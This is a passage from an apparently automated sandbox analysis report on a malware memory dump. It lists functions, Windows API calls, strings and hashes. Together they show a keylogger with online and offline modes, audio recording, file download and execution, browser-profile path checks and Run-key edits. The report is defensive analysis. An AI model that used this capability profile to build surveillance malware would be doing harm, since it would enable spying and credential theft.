                                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                  • String ID:
                                                                                                  • API String ID: 1761009282-0
                                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                  Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorHandling__start
                                                                                                  • String ID: pow
                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                  Function 00415B25 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CountEventTick
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 180926312-604454484
                                                                                                  • Opcode ID: 3d110430132f6e29bc14192fd350a252b6717718ca24c9f888e39da1cdfcc83b
                                                                                                  • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                                                                                  • Opcode Fuzzy Hash: 3d110430132f6e29bc14192fd350a252b6717718ca24c9f888e39da1cdfcc83b
                                                                                                  • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A
                                                                                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 0-711371036
                                                                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                  Function 0041631F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00416330
                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CloseCreateValue
                                                                                                  • String ID: !D@$okmode
                                                                                                  • API String ID: 3411444782-1942679189
                                                                                                  • Opcode ID: 12ba13807eab6586d54d8b76947bcdabd444acb82da4219e957d03d187be96ea
                                                                                                  • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                                                                                  • Opcode Fuzzy Hash: 12ba13807eab6586d54d8b76947bcdabd444acb82da4219e957d03d187be96ea
                                                                                                  • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                                                                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                  Strings
                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime
                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                  • API String ID: 481472006-1507639952
                                                                                                  • Opcode ID: fafa22d7485c9b9af755bd661b3a7c95bf01426dd8ce028ebaa8e1e096a55f09
                                                                                                  • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                                                                                  • Opcode Fuzzy Hash: fafa22d7485c9b9af755bd661b3a7c95bf01426dd8ce028ebaa8e1e096a55f09
                                                                                                  • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                                                                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32 ref: 0041667B
                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DownloadFileSleep
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 1931167962-604454484
                                                                                                  • Opcode ID: 91b47bb3d248b9412516c3bef8f3b74453e551bac57d09e9042e6c5246a12b59
                                                                                                  • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                                                                                  • Opcode Fuzzy Hash: 91b47bb3d248b9412516c3bef8f3b74453e551bac57d09e9042e6c5246a12b59
                                                                                                  • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                  Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime
                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                  • API String ID: 481472006-2430845779
                                                                                                  • Opcode ID: 23fa0ef33e23c51acc25039f5b4c387a24ac30d1e525e3dcef4a48577b83362e
                                                                                                  • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                                                                                  • Opcode Fuzzy Hash: 23fa0ef33e23c51acc25039f5b4c387a24ac30d1e525e3dcef4a48577b83362e
                                                                                                  • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                                                                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: alarm.wav$xYG
                                                                                                  • API String ID: 1174141254-3120134784
                                                                                                  • Opcode ID: 64cd0adba8cb64f7cc29e3bcfb1a1c37beafda4eb82c8f499b05d2b71789c391
                                                                                                  • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                                                                                  • Opcode Fuzzy Hash: 64cd0adba8cb64f7cc29e3bcfb1a1c37beafda4eb82c8f499b05d2b71789c391
                                                                                                  • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                                                                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                  • Opcode ID: 752f1b0530f09a227fccadca3f0ff38838367ade688bdeb0a317c415c2ec40dd
                                                                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                  • Opcode Fuzzy Hash: 752f1b0530f09a227fccadca3f0ff38838367ade688bdeb0a317c415c2ec40dd
                                                                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                                                                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                  • String ID: hMG
                                                                                                  • API String ID: 2315374483-350922481
                                                                                                  • Opcode ID: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                                                                                  • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                                                                                  • Opcode Fuzzy Hash: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                                                                                  • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                                                                                  Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocaleValid
                                                                                                  • String ID: IsValidLocaleName$kKD
                                                                                                  • API String ID: 1901932003-3269126172
                                                                                                  • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                  • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                  • API String ID: 1174141254-4188645398
                                                                                                  • Opcode ID: 06bc77d55e8fb5840851428069709c111eb9faa75ae45f14f57a1bd53324c730
                                                                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                  • Opcode Fuzzy Hash: 06bc77d55e8fb5840851428069709c111eb9faa75ae45f14f57a1bd53324c730
                                                                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                  • API String ID: 1174141254-2800177040
                                                                                                  • Opcode ID: bace6f47b7681df2663094d7cdbcc2af99c158e76f34949f98d6431700df5ab4
                                                                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                  • Opcode Fuzzy Hash: bace6f47b7681df2663094d7cdbcc2af99c158e76f34949f98d6431700df5ab4
                                                                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                  • API String ID: 1174141254-1629609700
                                                                                                  • Opcode ID: 0ad9673d5740a961e85d2e0bcc20bff1dc46e4ed95a55a23a34886f7ed05f085
                                                                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                  • Opcode Fuzzy Hash: 0ad9673d5740a961e85d2e0bcc20bff1dc46e4ed95a55a23a34886f7ed05f085
                                                                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                  • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                  • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: !D@$open
                                                                                                  • API String ID: 587946157-1586967515
                                                                                                  • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                  • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: State
                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                  • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                  • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                  • String ID: <kG$@kG
                                                                                                  • API String ID: 1881088180-1261746286
                                                                                                  • Opcode ID: d4565030f79739e4e66115585db0aa101e00d72097786d2d832482c72ad8666d
                                                                                                  • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                                                                                  • Opcode Fuzzy Hash: d4565030f79739e4e66115585db0aa101e00d72097786d2d832482c72ad8666d
                                                                                                  • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                                                                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteOpenValue
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                  Function 0044F38A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine
                                                                                                  • String ID: 88
                                                                                                  • API String ID: 3253501508-383729359
                                                                                                  • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                                                                  • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                                                                                  • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                                                                  • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                                                                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                                                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1717984340-0
                                                                                                  • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
